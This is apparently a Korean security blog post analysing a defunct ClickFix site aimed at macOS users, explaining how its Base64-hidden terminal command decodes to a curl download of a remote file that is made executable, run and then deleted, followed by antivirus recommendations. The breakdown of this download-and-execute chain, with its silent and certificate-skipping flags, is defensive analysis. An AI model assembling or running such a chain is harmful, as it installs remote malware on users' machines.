오늘은 macOS 사용자를 대상으로 한 ClickFix 공격 사이트 인 grapefruitfilenexus 분석에 대해서 분석을 해 보겠습니다. 일단 정확하지는 않지만 Grapefruit(그레이프프루트) 즉 Mac을 사용해 아이폰 앱에 보안 취약점이 없는지 혹은 어떻게 만들어졌는지 해킹 및 보안 분석을 하는 도구 사이트로 위장하고 있지 않을까? 생각이 들기도 합니다.
hxxp://grapefruitfilenexus(.)com/
해당 사이트는 일단 기본적으로 hxxp 로 인증서가 없는 것이 보이고 여기서 함정으로 GitHub 으로 되어 있는 것이 보일 것입니다. 해당 GitHub 하고는 상관없습니다. 일단 정확히는 맥 사용자를 노리는 클릭픽스(ClickFix) 사이트입니다.
여기서 보면 다음과 같은 사이트 주소를 확인할 수가 있으며 아주 친절하게 Terminal(터미널)를 사용을 해서 어떻게 사용을 하라고 설명 동영상도 첨부된 것 같습니다.
여기서 사용을 하는 Base64를 이용을 합니다.
분석
echo...:Base64로 숨겨진 명령을 복호화하고 즉시 Bash로 실행
curl -s -k (URL) -o. rc:원격 서버에서 파일을 내려받아 .rc라는 이름으로 저장
-s:사용자가 눈치채지 못하게 조용히 실행 및 진행 상황과 오류 숨기기 위한 의도
-k:TLS 인증서 검증 무시
chmod +x (.)rc:다운로드한 파일에 실행 권한 부여
./(.)rc:다운로드한 파일 실행
rm (.)rc:실행 후 파일 삭제
즉 Y3Vyb?At..->curl -s -k…. 형식으로 Base64에 보이게 됩니다.
일단 해당 사이트는 다행히 현재 영업이 종료된 상태이며 최근에는 macOS 사용자를 대상으로 해서 개인정보들 털어가려는 ClickFix도 활발하게 진행이 될 것이므로 macOS 사용자도 악성코드에 감염이 안 된다는 법이 없고 av-test 기준으로 보호, 성능, 편의성 모든 부문에서 6점 만점을 기록한 최우수 제품 들인 Avast Security,AVG Antivirus,Bitdefender Antivirus for Mac,ESET Security Ultimate,F-Secure Total,Intego One,Kaspersky Premium,Norton 360 제품 중에서 하나 선택을 해서 유료 결제 후 사용을 하는 것을 매우 권장합니다.
'소프트웨어 팁 > 보안 및 분석' 카테고리의 다른 글
| 애플 해커가 대화를 엿들을 수 있게 했던 비츠 스튜디오 버즈 취약점 수정 (0) | 2026.06.24 |
|---|---|
| 김수키(Kimsuky) 개인정보 유출 의심 확인 요청 으로 유포 되는 악성코드-2603vvip고객현황.lnk (0) | 2026.06.22 |
| Firefox 내장 VPN 업데이트 무제한 서비스 전환 및 28개국 추가 확대 (0) | 2026.06.19 |
| Kimsuky(김수키)에서 만든 악성코드-260506_한국 핵추진잠수함 협력 전략과 로드맵.pdf.lnk (0) | 2026.06.18 |
| 윈도우 권한 상승 취약점 GreenPlasma Poc 분석 (0) | 2026.06.17 |
| 김수키(Kimsuky)에서 만든 악성코드-파동에너지 이론 2026년 5월 개정판.lnk (0) | 2026.06.15 |
| 윈도우 10 KB5094127,윈도우 11 KB5094126&KB5093998 보안 업데이트 (0) | 2026.06.12 |
| USB 하나로 BitLocker(비트로커) 우회-YellowKey BitLocker 우회 취약점 (0) | 2026.06.11 |
